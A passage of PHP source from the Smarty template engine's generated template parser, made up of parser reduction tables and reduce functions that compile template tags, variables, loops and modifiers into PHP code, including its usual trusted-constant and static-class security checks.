  array( 0 => 78, 1 => 3 ),
  array( 0 => 76, 1 => 1 ),
  array( 0 => 76, 1 => 1 ),
  array( 0 => 76, 1 => 3 ),
  array( 0 => 76, 1 => 3 ),
  array( 0 => 76, 1 => 3 ),
  array( 0 => 76, 1 => 3 ),
  array( 0 => 76, 1 => 3 ),
  array( 0 => 76, 1 => 2 ),
  array( 0 => 76, 1 => 3 ),
  array( 0 => 76, 1 => 3 ),
  array( 0 => 84, 1 => 7 ),
  array( 0 => 84, 1 => 7 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 2 ),
  array( 0 => 75, 1 => 2 ),
  array( 0 => 75, 1 => 2 ),
  array( 0 => 75, 1 => 2 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 3 ),
  array( 0 => 75, 1 => 2 ),
  array( 0 => 75, 1 => 2 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 3 ),
  array( 0 => 75, 1 => 3 ),
  array( 0 => 75, 1 => 3 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 3 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 2 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 1 ),
  array( 0 => 75, 1 => 3 ),
  array( 0 => 90, 1 => 1 ),
  array( 0 => 90, 1 => 1 ),
  array( 0 => 74, 1 => 1 ),
  array( 0 => 74, 1 => 1 ),
  array( 0 => 74, 1 => 3 ),
  array( 0 => 74, 1 => 1 ),
  array( 0 => 74, 1 => 3 ),
  array( 0 => 74, 1 => 4 ),
  array( 0 => 74, 1 => 3 ),
  array( 0 => 74, 1 => 4 ),
  array( 0 => 71, 1 => 2 ),
  array( 0 => 71, 1 => 2 ),
  array( 0 => 95, 1 => 2 ),
  array( 0 => 95, 1 => 0 ),
  array( 0 => 96, 1 => 2 ),
  array( 0 => 96, 1 => 2 ),
  array( 0 => 96, 1 => 4 ),
  array( 0 => 96, 1 => 2 ),
  array( 0 => 96, 1 => 2 ),
  array( 0 => 96, 1 => 4 ),
  array( 0 => 96, 1 => 3 ),
  array( 0 => 96, 1 => 5 ),
  array( 0 => 96, 1 => 3 ),
  array( 0 => 96, 1 => 3 ),
  array( 0 => 96, 1 => 3 ),
  array( 0 => 96, 1 => 3 ),
  array( 0 => 96, 1 => 3 ),
  array( 0 => 96, 1 => 3 ),
  array( 0 => 96, 1 => 2 ),
  array( 0 => 81, 1 => 1 ),
  array( 0 => 81, 1 => 1 ),
  array( 0 => 81, 1 => 2 ),
  array( 0 => 97, 1 => 1 ),
  array( 0 => 97, 1 => 1 ),
  array( 0 => 97, 1 => 3 ),
  array( 0 => 94, 1 => 2 ),
  array( 0 => 98, 1 => 1 ),
  array( 0 => 98, 1 => 2 ),
  array( 0 => 99, 1 => 3 ),
  array( 0 => 99, 1 => 3 ),
  array( 0 => 99, 1 => 5 ),
  array( 0 => 99, 1 => 6 ),
  array( 0 => 99, 1 => 2 ),
  array( 0 => 89, 1 => 4 ),
  array( 0 => 100, 1 => 4 ),
  array( 0 => 100, 1 => 4 ),
  array( 0 => 101, 1 => 3 ),
  array( 0 => 101, 1 => 1 ),
  array( 0 => 101, 1 => 0 ),
  array( 0 => 77, 1 => 3 ),
  array( 0 => 77, 1 => 2 ),
  array( 0 => 102, 1 => 3 ),
  array( 0 => 102, 1 => 2 ),
  array( 0 => 82, 1 => 2 ),
  array( 0 => 82, 1 => 0 ),
  array( 0 => 103, 1 => 2 ),
  array( 0 => 103, 1 => 3 ),
  array( 0 => 103, 1 => 2 ),
  array( 0 => 92, 1 => 1 ),
  array( 0 => 92, 1 => 2 ),
  array( 0 => 92, 1 => 1 ),
  array( 0 => 92, 1 => 2 ),
  array( 0 => 92, 1 => 3 ),
  array( 0 => 86, 1 => 1 ),
  array( 0 => 86, 1 => 1 ),
  array( 0 => 85, 1 => 1 ),
  array( 0 => 87, 1 => 1 ),
  array( 0 => 93, 1 => 3 ),
  array( 0 => 93, 1 => 3 ),
  array( 0 => 104, 1 => 1 ),
  array( 0 => 104, 1 => 3 ),
  array( 0 => 104, 1 => 0 ),
  array( 0 => 105, 1 => 3 ),
  array( 0 => 105, 1 => 3 ),
  array( 0 => 105, 1 => 1 ),
  array( 0 => 91, 1 => 2 ),
  array( 0 => 91, 1 => 3 ),
  array( 0 => 106, 1 => 2 ),
  array( 0 => 106, 1 => 1 ),
  array( 0 => 107, 1 => 3 ),
  array( 0 => 107, 1 => 3 ),
  array( 0 => 107, 1 => 1 ),
  array( 0 => 107, 1 => 3 ),
  array( 0 => 107, 1 => 3 ),
  array( 0 => 107, 1 => 1 ),
  array( 0 => 107, 1 => 1 ),
    );

    public static $yyReduceMap = array(
        0 => 0,
        1 => 1,
        2 => 2,
        3 => 3,
        4 => 4,
        5 => 5,
        6 => 6,
        21 => 6,
        22 => 6,
        23 => 6,
        36 => 6,
        56 => 6,
        57 => 6,
        65 => 6,
        66 => 6,
        77 => 6,
        82 => 6,
        83 => 6,
        88 => 6,
        92 => 6,
        93 => 6,
        97 => 6,
        98 => 6,
        100 => 6,
        105 => 6,
        169 => 6,
        174 => 6,
        7 => 7,
        8 => 8,
        9 => 9,
        11 => 11,
        12 => 12,
        13 => 13,
        14 => 14,
        15 => 15,
        16 => 16,
        17 => 17,
        18 => 18,
        19 => 19,
        20 => 20,
        24 => 24,
        25 => 25,
        26 => 26,
        27 => 27,
        28 => 28,
        29 => 29,
        30 => 30,
        31 => 31,
        33 => 31,
        32 => 32,
        34 => 34,
        35 => 35,
        37 => 37,
        38 => 38,
        39 => 39,
        40 => 40,
        41 => 41,
        42 => 42,
        43 => 43,
        44 => 44,
        45 => 45,
        46 => 46,
        47 => 47,
        48 => 48,
        49 => 49,
        50 => 50,
        59 => 50,
        147 => 50,
        151 => 50,
        155 => 50,
        157 => 50,
        51 => 51,
        148 => 51,
        154 => 51,
        52 => 52,
        53 => 53,
        54 => 53,
        55 => 55,
        132 => 55,
        58 => 58,
        60 => 60,
        61 => 61,
        62 => 61,
        63 => 63,
        64 => 64,
        67 => 67,
        68 => 68,
        69 => 68,
        70 => 70,
        71 => 71,
        72 => 72,
        73 => 73,
        74 => 74,
        75 => 75,
        76 => 76,
        78 => 78,
        80 => 78,
        81 => 78,
        112 => 78,
        79 => 79,
        84 => 84,
        85 => 85,
        86 => 86,
        87 => 87,
        89 => 89,
        90 => 90,
        91 => 90,
        94 => 94,
        95 => 95,
        96 => 96,
        99 => 99,
        101 => 101,
        102 => 102,
        103 => 103,
        104 => 104,
        106 => 106,
        107 => 107,
        108 => 108,
        109 => 109,
        110 => 110,
        111 => 111,
        113 => 113,
        171 => 113,
        114 => 114,
        115 => 115,
        116 => 116,
        117 => 117,
        118 => 118,
        119 => 119,
        127 => 119,
        120 => 120,
        121 => 121,
        122 => 122,
        123 => 122,
        125 => 122,
        126 => 122,
        124 => 124,
        128 => 128,
        129 => 129,
        130 => 130,
        175 => 130,
        131 => 131,
        133 => 133,
        134 => 134,
        135 => 135,
        136 => 136,
        137 => 137,
        138 => 138,
        139 => 139,
        140 => 140,
        141 => 141,
        142 => 142,
        143 => 143,
        144 => 144,
        145 => 145,
        146 => 146,
        149 => 149,
        150 => 150,
        152 => 152,
        153 => 153,
        156 => 156,
        158 => 158,
        159 => 159,
        160 => 160,
        161 => 161,
        162 => 162,
        163 => 163,
        164 => 164,
        165 => 165,
        166 => 166,
        167 => 167,
        168 => 167,
        170 => 170,
        172 => 172,
        173 => 173,
        176 => 176,
        177 => 177,
        178 => 178,
        179 => 179,
        182 => 179,
        180 => 180,
        183 => 180,
        181 => 181,
        184 => 184,
        185 => 185,
    );
// line 233 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r0(){
    $this->root_buffer->prepend_array($this, $this->template_prefix);
    $this->root_buffer->append_array($this, $this->template_postfix);
    $this->_retvalue = $this->root_buffer->to_smarty_php($this);
    }
// line 240 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r1(){
         $text = $this->yystack[ $this->yyidx + 0 ]->minor;

         if ((string)$text == '') {
            $this->current_buffer->append_subtree($this, null);
         }

         $this->current_buffer->append_subtree($this, new Smarty_Internal_ParseTree_Text($text, $this->strip));
    }
// line 250 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r2(){
    $this->strip = true;
    }
// line 254 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r3(){
    $this->strip = false;
    }
// line 259 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r4(){
       $this->current_buffer->append_subtree($this, new Smarty_Internal_ParseTree_Text($this->yystack[$this->yyidx + -1]->minor));
    }
// line 264 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r5(){
    $this->_retvalue = $this->yystack[$this->yyidx + -3]->minor.$this->yystack[$this->yyidx + -1]->minor;
    }
// line 267 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r6(){
    $this->_retvalue = $this->yystack[$this->yyidx + 0]->minor;
    }
// line 271 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r7(){
        $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor.$this->yystack[$this->yyidx + 0]->minor;

    }
// line 276 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r8(){
    $this->_retvalue = '';
    }
// line 280 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r9(){
      if ($this->compiler->has_code) {
          $this->current_buffer->append_subtree($this, $this->mergePrefixCode($this->yystack[$this->yyidx + 0]->minor));
      }
     $this->compiler->has_variable_string = false;
     $this->block_nesting_level = count($this->compiler->_tag_stack);
    }
// line 292 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r11(){
    $var = trim(substr($this->yystack[$this->yyidx + 0]->minor, $this->compiler->getLdelLength(), -$this->compiler->getRdelLength()), ' $');
    if (preg_match('/^(.*)(\s+nocache)$/', $var, $match)) {
        $this->_retvalue = $this->compiler->compileTag('private_print_expression',array('nocache'),array('value'=>$this->compiler->compileVariable('\''.$match[1].'\'')));
    } else {
        $this->_retvalue = $this->compiler->compileTag('private_print_expression',array(),array('value'=>$this->compiler->compileVariable('\''.$var.'\'')));
    }
    }
// line 302 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r12(){
    $tag = trim(substr($this->yystack[$this->yyidx + 0]->minor, $this->compiler->getLdelLength(), -$this->compiler->getRdelLength()));
    if ($tag == 'strip') {
        $this->strip = true;
        $this->_retvalue = null;
    } else {
        if (defined($tag)) {
            if ($this->security) {
               $this->security->isTrustedConstant($tag, $this->compiler);
            }
            $this->_retvalue = $this->compiler->compileTag('private_print_expression',array(),array('value'=>$tag));
        } else {
            if (preg_match('/^(.*)(\s+nocache)$/', $tag, $match)) {
                $this->_retvalue = $this->compiler->compileTag($match[1],array('\'nocache\''));
            } else {
                $this->_retvalue = $this->compiler->compileTag($tag,array());
            }
        }
    }
    }
// line 323 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r13(){
    $j = strrpos($this->yystack[$this->yyidx + 0]->minor,'.');
    if ($this->yystack[$this->yyidx + 0]->minor[$j+1] == 'c') {
        // {$smarty.block.child}
        $this->_retvalue = $this->compiler->compileTag('child',array(),array($this->yystack[$this->yyidx + 0]->minor));
    } else {
        // {$smarty.block.parent}
       $this->_retvalue = $this->compiler->compileTag('parent',array(),array($this->yystack[$this->yyidx + 0]->minor));
     }
    }
// line 334 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r14(){
    $this->_retvalue  = $this->yystack[$this->yyidx + -1]->minor;
    }
// line 338 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r15(){
     $this->_retvalue  = $this->yystack[$this->yyidx + -1]->minor;
     }
// line 342 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r16(){
    $this->_retvalue = $this->compiler->compileTag('private_print_expression',$this->yystack[$this->yyidx + 0]->minor[1],array('value'=>$this->yystack[$this->yyidx + 0]->minor[0]));
    }
// line 351 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r17(){
    $this->_retvalue = $this->compiler->compileTag('assign',array_merge(array(array('value'=>$this->yystack[$this->yyidx + 0]->minor[0]),array('var'=>'\''.substr($this->yystack[$this->yyidx + -1]->minor,1).'\'')),$this->yystack[$this->yyidx + 0]->minor[1]));
    }
// line 355 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r18(){
    $this->_retvalue = $this->compiler->compileTag('assign',array_merge(array(array('value'=>$this->yystack[$this->yyidx + 0]->minor[0]),array('var'=>$this->yystack[$this->yyidx + -1]->minor['var'])),$this->yystack[$this->yyidx + 0]->minor[1]),array('smarty_internal_index'=>$this->yystack[$this->yyidx + -1]->minor['smarty_internal_index']));
    }
// line 359 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r19(){
       $this->_retvalue = $this->yystack[$this->yyidx + 0]->minor;
    }
// line 363 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r20(){
    $this->_retvalue = array($this->yystack[$this->yyidx + -1]->minor,$this->yystack[$this->yyidx + 0]->minor);
    }
// line 378 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r24(){
        if (defined($this->yystack[$this->yyidx + -1]->minor)) {
            if ($this->security) {
                $this->security->isTrustedConstant($this->yystack[$this->yyidx + -1]->minor, $this->compiler);
            }
            $this->_retvalue = $this->compiler->compileTag('private_print_expression',$this->yystack[$this->yyidx + 0]->minor,array('value'=>$this->yystack[$this->yyidx + -1]->minor));
        } else {
            $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + -1]->minor,$this->yystack[$this->yyidx + 0]->minor);
        }
    }
// line 388 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r25(){
        if (defined($this->yystack[$this->yyidx + 0]->minor)) {
            if ($this->security) {
                $this->security->isTrustedConstant($this->yystack[$this->yyidx + 0]->minor, $this->compiler);
            }
            $this->_retvalue = $this->compiler->compileTag('private_print_expression',array(),array('value'=>$this->yystack[$this->yyidx + 0]->minor));
        } else {
            $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + 0]->minor,array());
        }
    }
// line 401 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r26(){
        if (defined($this->yystack[$this->yyidx + -2]->minor)) {
            if ($this->security) {
                $this->security->isTrustedConstant($this->yystack[$this->yyidx + -2]->minor, $this->compiler);
            }
            $this->_retvalue = $this->compiler->compileTag('private_print_expression',$this->yystack[$this->yyidx + 0]->minor,array('value'=>$this->yystack[$this->yyidx + -2]->minor, 'modifierlist'=>$this->yystack[$this->yyidx + -1]->minor));
        } else {
            $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + -2]->minor,$this->yystack[$this->yyidx + 0]->minor, array('modifierlist'=>$this->yystack[$this->yyidx + -1]->minor));
        }
    }
// line 413 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r27(){
    $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + -3]->minor,$this->yystack[$this->yyidx + 0]->minor,array('object_method'=>$this->yystack[$this->yyidx + -1]->minor));
    }
// line 418 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r28(){
    $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + -4]->minor,$this->yystack[$this->yyidx + 0]->minor,array('modifierlist'=>$this->yystack[$this->yyidx + -1]->minor, 'object_method'=>$this->yystack[$this->yyidx + -2]->minor));
    }
// line 423 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r29(){
    $this->_retvalue = $this->compiler->compileTag('make_nocache',array(array('var'=>'\''.substr($this->yystack[$this->yyidx + 0]->minor,1).'\'')));
    }
// line 428 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r30(){
    $tag = trim(substr($this->yystack[$this->yyidx + -1]->minor,$this->compiler->getLdelLength())); 
    $this->_retvalue = $this->compiler->compileTag(($tag === 'else if')? 'elseif' : $tag,array(),array('if condition'=>$this->yystack[$this->yyidx + 0]->minor));
    }
// line 433 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r31(){
    $tag = trim(substr($this->yystack[$this->yyidx + -2]->minor,$this->compiler->getLdelLength()));
    $this->_retvalue = $this->compiler->compileTag(($tag === 'else if')? 'elseif' : $tag,$this->yystack[$this->yyidx + 0]->minor,array('if condition'=>$this->yystack[$this->yyidx + -1]->minor));
    }
// line 438 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r32(){
    $tag = trim(substr($this->yystack[$this->yyidx + -1]->minor,$this->compiler->getLdelLength()));
    $this->_retvalue = $this->compiler->compileTag(($tag === 'else if')? 'elseif' : $tag,array(),array('if condition'=>$this->yystack[$this->yyidx + 0]->minor));
    }
// line 449 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r34(){
    $this->_retvalue = $this->compiler->compileTag('for',array_merge($this->yystack[$this->yyidx + 0]->minor,array(array('start'=>$this->yystack[$this->yyidx + -6]->minor),array('ifexp'=>$this->yystack[$this->yyidx + -4]->minor),array('var'=>$this->yystack[$this->yyidx + -2]->minor),array('step'=>$this->yystack[$this->yyidx + -1]->minor))),1);
    }
// line 453 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r35(){
    $this->_retvalue = '='.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 461 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r37(){
    $this->_retvalue = $this->compiler->compileTag('for',array_merge($this->yystack[$this->yyidx + 0]->minor,array(array('start'=>$this->yystack[$this->yyidx + -3]->minor),array('to'=>$this->yystack[$this->yyidx + -1]->minor))),0);
    }
// line 465 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r38(){
    $this->_retvalue = $this->compiler->compileTag('for',array_merge($this->yystack[$this->yyidx + 0]->minor,array(array('start'=>$this->yystack[$this->yyidx + -5]->minor),array('to'=>$this->yystack[$this->yyidx + -3]->minor),array('step'=>$this->yystack[$this->yyidx + -1]->minor))),0);
    }
// line 470 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r39(){
    $this->_retvalue = $this->compiler->compileTag('foreach',array_merge($this->yystack[$this->yyidx + 0]->minor,array(array('from'=>$this->yystack[$this->yyidx + -3]->minor),array('item'=>$this->yystack[$this->yyidx + -1]->minor))));
    }
// line 474 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r40(){
    $this->_retvalue = $this->compiler->compileTag('foreach',array_merge($this->yystack[$this->yyidx + 0]->minor,array(array('from'=>$this->yystack[$this->yyidx + -5]->minor),array('item'=>$this->yystack[$this->yyidx + -1]->minor),array('key'=>$this->yystack[$this->yyidx + -3]->minor))));
    }
// line 477 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r41(){
    $this->_retvalue = $this->compiler->compileTag('foreach',$this->yystack[$this->yyidx + 0]->minor);
    }
// line 482 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r42(){
    $this->_retvalue = $this->compiler->compileTag('setfilter',array(),array('modifier_list'=>array(array_merge(array($this->yystack[$this->yyidx + -1]->minor),$this->yystack[$this->yyidx + 0]->minor))));
    }
// line 486 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r43(){
    $this->_retvalue = $this->compiler->compileTag('setfilter',array(),array('modifier_list'=>array_merge(array(array_merge(array($this->yystack[$this->yyidx + -2]->minor),$this->yystack[$this->yyidx + -1]->minor)),$this->yystack[$this->yyidx + 0]->minor)));
    }
// line 492 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r44(){
    $tag = trim(substr($this->yystack[$this->yyidx + 0]->minor, $this->compiler->getLdelLength(), -$this->compiler->getRdelLength()), ' /');
    if ($tag === 'strip') {
        $this->strip = false;
        $this->_retvalue = null;
    } else {
       $this->_retvalue = $this->compiler->compileTag($tag.'close',array());
    }
     }
// line 501 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r45(){
    $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + 0]->minor.'close',array());
    }
// line 505 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r46(){
    $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + -1]->minor.'close',array(),array('modifier_list'=>$this->yystack[$this->yyidx + 0]->minor));
    }
// line 510 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r47(){
    $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + -2]->minor.'close',array(),array('object_method'=>$this->yystack[$this->yyidx + 0]->minor));
    }
// line 514 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r48(){
    $this->_retvalue = $this->compiler->compileTag($this->yystack[$this->yyidx + -3]->minor.'close',array(),array('object_method'=>$this->yystack[$this->yyidx + -1]->minor, 'modifier_list'=>$this->yystack[$this->yyidx + 0]->minor));
    }
// line 522 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r49(){
    $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor;
    $this->_retvalue[] = $this->yystack[$this->yyidx + 0]->minor;
    }
// line 528 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r50(){
    $this->_retvalue = array($this->yystack[$this->yyidx + 0]->minor);
    }
// line 533 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r51(){
    $this->_retvalue = array();
    }
// line 538 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r52(){
    if (defined($this->yystack[$this->yyidx + 0]->minor)) {
        if ($this->security) {
            $this->security->isTrustedConstant($this->yystack[$this->yyidx + 0]->minor, $this->compiler);
        }
        $this->_retvalue = array($this->yystack[$this->yyidx + -2]->minor=>$this->yystack[$this->yyidx + 0]->minor);
    } else {
        $this->_retvalue = array($this->yystack[$this->yyidx + -2]->minor=>'\''.$this->yystack[$this->yyidx + 0]->minor.'\'');
    }
    }
// line 549 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r53(){
    $this->_retvalue = array(trim($this->yystack[$this->yyidx + -1]->minor," =\n\r\t")=>$this->yystack[$this->yyidx + 0]->minor);
    }
// line 557 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r55(){
    $this->_retvalue = '\''.$this->yystack[$this->yyidx + 0]->minor.'\'';
    }
// line 569 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r58(){
    $this->_retvalue = array($this->yystack[$this->yyidx + -2]->minor=>$this->yystack[$this->yyidx + 0]->minor);
    }
// line 582 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r60(){
    $this->yystack[$this->yyidx + -2]->minor[]=$this->yystack[$this->yyidx + 0]->minor;
    $this->_retvalue = $this->yystack[$this->yyidx + -2]->minor;
    }
// line 587 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r61(){
    $this->_retvalue = array('var' => '\''.substr($this->yystack[$this->yyidx + -2]->minor,1).'\'', 'value'=>$this->yystack[$this->yyidx + 0]->minor);
    }
// line 594 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r63(){
    $this->_retvalue = array('var' => $this->yystack[$this->yyidx + -2]->minor, 'value'=>$this->yystack[$this->yyidx + 0]->minor);
    }
// line 598 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r64(){
    $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor;
    }
// line 618 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r67(){
    $this->_retvalue = '$_smarty_tpl->getStreamVariable(\''.substr($this->yystack[$this->yyidx + -2]->minor,1).'://' . $this->yystack[$this->yyidx + 0]->minor . '\')';
    }
// line 623 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r68(){
    $this->_retvalue = $this->yystack[$this->yyidx + -2]->minor . trim($this->yystack[$this->yyidx + -1]->minor) . $this->yystack[$this->yyidx + 0]->minor;
    }
// line 633 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r70(){
    $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor['pre']. $this->yystack[$this->yyidx + -2]->minor.$this->yystack[$this->yyidx + -1]->minor['op'].$this->yystack[$this->yyidx + 0]->minor .')';
    }
// line 637 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r71(){
    $this->_retvalue = $this->yystack[$this->yyidx + -2]->minor.$this->yystack[$this->yyidx + -1]->minor.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 641 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r72(){
    $this->_retvalue = $this->yystack[$this->yyidx + 0]->minor . $this->yystack[$this->yyidx + -1]->minor . ')';
    }
// line 645 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r73(){
    $this->_retvalue = 'in_array('.$this->yystack[$this->yyidx + -2]->minor.','.$this->yystack[$this->yyidx + 0]->minor.')';
    }
// line 649 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r74(){
    $this->_retvalue = 'in_array('.$this->yystack[$this->yyidx + -2]->minor.',(array)'.$this->yystack[$this->yyidx + 0]->minor.')';
    }
// line 657 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r75(){
    $this->_retvalue = $this->yystack[$this->yyidx + -5]->minor.' ? '. $this->compiler->compileVariable('\''.substr($this->yystack[$this->yyidx + -2]->minor,1).'\'') . ' : '.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 661 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r76(){
    $this->_retvalue = $this->yystack[$this->yyidx + -5]->minor.' ? '.$this->yystack[$this->yyidx + -2]->minor.' : '.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 671 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r78(){
    $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 676 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r79(){
    $this->_retvalue = '!'.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 697 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r84(){
    $this->_retvalue = $this->yystack[$this->yyidx + -2]->minor.'.'.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 701 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r85(){
    $this->_retvalue = $this->yystack[$this->yyidx + -1]->minor.'.';
    }
// line 705 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r86(){
    $this->_retvalue = '.'.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 710 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r87(){
    if (defined($this->yystack[$this->yyidx + 0]->minor)) {
        if ($this->security) {
             $this->security->isTrustedConstant($this->yystack[$this->yyidx + 0]->minor, $this->compiler);
        }
        $this->_retvalue = $this->yystack[$this->yyidx + 0]->minor;
    } else {
        $this->_retvalue = '\''.$this->yystack[$this->yyidx + 0]->minor.'\'';
    }
    }
// line 727 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r89(){
    $this->_retvalue = '('. $this->yystack[$this->yyidx + -1]->minor .')';
    }
// line 731 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r90(){
      $this->_retvalue = $this->yystack[$this->yyidx + -2]->minor.$this->yystack[$this->yyidx + -1]->minor.$this->yystack[$this->yyidx + 0]->minor;
    }
// line 749 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r94(){
	    if ($this->security && $this->security->static_classes !== array()) {
		    $this->compiler->trigger_template_error('dynamic static class not allowed by security setting');
	    }
    $prefixVar = $this->compiler->getNewPrefixVariable();
    if ($this->yystack[$this->yyidx + -2]->minor['var'] === '\'smarty\'') {
        $this->compiler->appendPrefixCode("<?php {$prefixVar} = ". $this->compiler->compileTag('private_special_variable',array(),$this->yystack[$this->yyidx + -2]->minor['smarty_internal_index']).';?>');
     } else {
        $this->compiler->appendPrefixCode("<?php  {$prefixVar} = ". $this->compiler->compileVariable($this->yystack[$this->yyidx + -2]->minor['var']).$this->yystack[$this->yyidx + -2]->minor['smarty_internal_index'].';?>');
    }
    $this->_retvalue = $prefixVar .'::'.$this->yystack[$this->yyidx + 0]->minor[0].$this->yystack[$this->yyidx + 0]->minor[1];
    }
// line 760 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r95(){
    $prefixVar = $this->compiler->getNewPrefixVariable();
    $tmp = $this->compiler->appendCode('<?php ob_start();?>', $this->yystack[$this->yyidx + 0]->minor);
    $this->compiler->appendPrefixCode($this->compiler->appendCode($tmp, "<?php {$prefixVar} = ob_get_clean();?>"));
    $this->_retvalue = $prefixVar;
    }
// line 767 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r96(){
    $this->_retvalue = $this->compiler->compileTag('private_modifier',array(),array('value'=>$this->yystack[$this->yyidx + -1]->minor,'modifierlist'=>$this->yystack[$this->yyidx + 0]->minor));
    }
// line 780 "../smarty/lexer/smarty_internal_templateparser.y"
    public function yy_r99(){
    if (!in_array(strtolower($this->yystack[$this->yyidx + -2]->minor), array('self', 'parent')) && (!$this->security || $this->security->isTrustedStaticClassAccess($this->yystack[$this->yyidx + -2]->minor, $this->yystack[$this->yyidx + 0]->minor, $this->compiler))) {
        if (isset($this->smarty->registered_classes[$this->yystack[$this->yyidx + -2]->minor])) {
            $this->_retvalue = $this->smarty->registered_classes[$this->yystack[$this->yyidx + -2]->minor].'::'.$this->yystack[$this->yyidx + 0]->minor[0].$this->yystack[$this->yyidx + 0]->minor[1];
        } else {
            trigger_error('Using unregistered static method "' . $this->yystack[$this->yyidx + -2]->minor.'::'.$this->yystack[$this->yyidx + 0]->minor[0] . '" in a template is deprecated and will be ' .
